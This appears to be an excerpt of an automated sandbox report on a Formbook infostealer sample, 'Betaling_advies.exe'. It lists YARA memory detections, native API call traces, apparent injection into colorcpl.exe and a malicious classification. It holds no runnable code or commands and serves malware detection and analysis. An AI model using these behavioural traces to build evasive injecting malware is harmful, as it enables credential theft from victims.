          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A7B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79A10 NtQuerySection,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A7A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A7AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79560 NtWriteFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A796D0 NtCreateKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A7A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79760 NtOpenProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A79770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A7A770 NtOpenThread,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_004182E0 NtClose,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_004181AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_004182DA NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0470AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0470A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0470A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0470B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04709B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0470A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02548260 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_025482E0 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02548390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_025481B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_025482DA NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_025481AA NtCreateFile,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_004046A7
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00401030
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00408C4B
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00408C50
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_0041BC56
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_0041B496
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_0041CD31
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00402D87
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00402D90
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A620A0
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B020A8
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A4B090
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B028EC
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B0E824
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AF1002
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A54120
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A3F900
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B022AE
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AEFA2B
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A6EBB0
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AF03DA
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AFDBD2
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B02B28
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A4841F
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AFD466
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A62581
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A4D5E0
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B025DD
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A30D20
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B02D07
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B01D55
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B02EF7
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00A56E30
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00AFD616
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B01FF1
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_2_00B0DFCE
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00408C4B
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00408C50
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_0041BC56
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_0041B496
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_0041CD31
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00402D87
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00402D90
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 1_1_00402FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0478D466
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046D841F
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04791D55
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046C0D20
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04792D07
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046DD5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047925DD
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046F2581
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046E6E30
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0478D616
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04792EF7
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04791FF1
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04781002
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047928EC
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046F20A0
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047920A8
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046DB090
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046E4120
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046CF900
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_047922AE
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_04792B28
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0478DBD2
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_046FEBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02532FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02538C50
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02538C4B
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0254B496
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_0254CD31
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02532D90
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: 7_2_02532D87
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: String function: 00A3B150 appears 45 times
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: String function: 0041A090 appears 38 times
          Source: C:\Windows\SysWOW64\colorcpl.exe, Code function: String function: 046CB150 appears 35 times
          Source: Betaling_advies.exe, 00000000.00000003.651276724.000000001F15F000.00000004.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Betaling_advies.exe
          Source: Betaling_advies.exe, 00000001.00000002.692105049.0000000000B2F000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamentdll.dllj% vs Betaling_advies.exe
          Source: Betaling_advies.exe, 00000001.00000002.692711929.0000000000D73000.00000040.00000001.sdmp, Binary or memory string: OriginalFilenamecolorcpl.exej% vs Betaling_advies.exe
          Source: Betaling_advies.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.650199576.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.691540714.00000000009C0000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.654811569.0000000002680000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.910277347.0000000002530000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.690806042.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.692667485.0000000000D40000.00000040.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.909643904.0000000000320000.00000004.00000001.sdmp, type: MEMORY, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betaling_advies.exe.2680000.1.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Betaling_advies.exe.2680000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betaling_advies.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Betaling_advies.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine, Classification label: mal100.troj.evad.winEXE@7/3@15/9
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\Desktop\Betaling_advies.exe, Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5792:120:WilError_01
          Source: C:\Users\user\Desktop\Betaling_advies.exe, File created: C:\Users\user\AppData\Local\Temp\nsx3A69.tmp
